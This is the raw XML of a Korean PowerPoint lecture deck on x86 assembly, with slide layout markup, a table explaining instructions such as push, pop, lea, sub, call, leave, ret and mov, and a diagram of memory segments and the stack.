            <a:off x="5814490" y="2077559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제 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오퍼랜드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59DFDC1-21EF-412C-BF2C-5D715E16DB4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8750596" y="3806223"/>
            <a:ext cx="417749" cy="2374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DF15D-A3EC-429E-80AE-003AC3B6850C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8376618" y="417948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설명문</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16941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778BDB2F-516E-484A-A213-F2B262AC7B18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="14923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어셈블리어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E196BD-4A0A-412E-B131-52B55A1E0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68604"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="365760" y="1519765"/>
          <a:ext cx="11499141" cy="4989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491">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="270218264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808244132"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7515225">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="634504456"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="280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111921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push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push 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값을 스택 상위에 저장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esp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그 크기만큼 감소한다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450533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pop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pop  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스택의 가장 상위에 있는 값을 꺼내서 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저장 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esp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그 크기만큼 증가한다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54739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lea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lea   -0xa(%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ebp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ebp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만큼 작은 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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주소값을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저장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61984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sub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sub   $0x8, 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esp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esp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값에 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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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빼준다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(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스택이 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바이트 확장되었다는 의미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22656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call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call   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함수의 주소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함수를 호출한다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6948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leave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leave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함수의 종료 시 에필로그 작업을 해준다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2064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ret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ret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함수의 종료 시에 사용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함수를 호출했던 다음 지점으로 이동한다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72009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="5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mov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mov  $0x16, %</a:t>
                      </a:r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Eax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넣는다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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9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45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9531D69D-93AF-4F00-A1D3-C1B2BBCCB94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="229970"/>
            <a:ext cx="91437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spc="-148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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" spc="-148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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" spc="-148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48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400" spc="-148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값을 스택 상위에 저장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esp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그 크기만큼 감소한다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07296C-C5EC-458B-B21A-3AED3306CCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="365760" y="1250086"/>
            <a:ext cx="5192735" cy="4738996"/>
            <a:chOff x="365760" y="1250086"/>
            <a:chExt cx="5192735" cy="47389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D49724-7309-4B1E-87D6-CAA56712EC70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1360975" y="1305446"/>
              <a:ext cx="2414726" cy="2637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D2CEBF-83B9-483E-ACDD-AE3C673525DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1360975" y="3943350"/>
              <a:ext cx="2414726" cy="8046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924DC1-0EA6-4DB6-AD21-FAF1A0C5F25F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1360975" y="4747952"/>
              <a:ext cx="2414726" cy="8046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명령어</a:t>
              </a:r>
              <a:endPara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29B460-E07C-43C3-8E7E-B57CCAE10D30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="365760" y="2352675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435C9F-3AD0-4C53-861F-F02C3D21176F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="365760" y="412432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C6A95-2910-4D47-A5F6-3B830F504C95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="365760" y="4965587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Code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08ABCF-A76C-4E88-BFB8-501AF13A9E91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1850032" y="5619750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&lt;Segment&gt;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BA2573-7FE1-47C6-8A8B-9D1E269EE2C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3143769" y="1250086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상위 주소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0C91C6-288D-467A-99B8-AE286734D021}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3143769" y="5288518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하위 주소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612ABD-EDE1-458A-BEEE-04A4A83B9112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6543675" y="1286588"/>
            <a:ext cx="2575340" cy="2674483"/>
            <a:chOff x="6553200" y="1305446"/>
            <a:chExt cx="2575340" cy="2674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52F825-FC63-4CF1-B3F5-6EC28C199660}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6633507" y="1305446"/>
              <a:ext cx="2414726" cy="2637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0701B2-51BC-431E-A9BD-610C54CD2363}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6553200" y="3866958"/>
              <a:ext cx="2575340" cy="112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DBE191E-4E98-43D1-992A-34050DF4C2D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9119015" y="978663"/>
            <a:ext cx="860963" cy="61584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</a:t>
            </a:r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A246E1-5F27-4B47-9475-31294144E11E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6623982" y="1286587"/>
            <a:ext cx="2414726" cy="398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eax</a:t>
            </a:r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있던 값</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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971940-4654-47E0-B350-F43636F0C6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318223" y="84732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&lt;stack&gt;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77556E-17 L -3.125E-6 0.058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 테마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 테마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4602</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>600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나눔스퀘어 Bold</vt:lpstr>
      <vt:lpstr>함초롬돋움</vt:lpstr>
      <vt:lpstr>나눔스퀘어 ExtraBold</vt:lpstr>
      <vt:lpstr>나눔스퀘어</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>메인 레이아웃_2</vt:lpstr>
      <vt:lpstr>목차 레이아웃</vt:lpstr>
      <vt:lpstr>내용 레이아웃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황인서</cp:lastModifiedBy>
  <cp:revision>146</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-13T13:12:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-27T21:21:32Z</dcterms:modified>
</cp:coreProperties>
</file>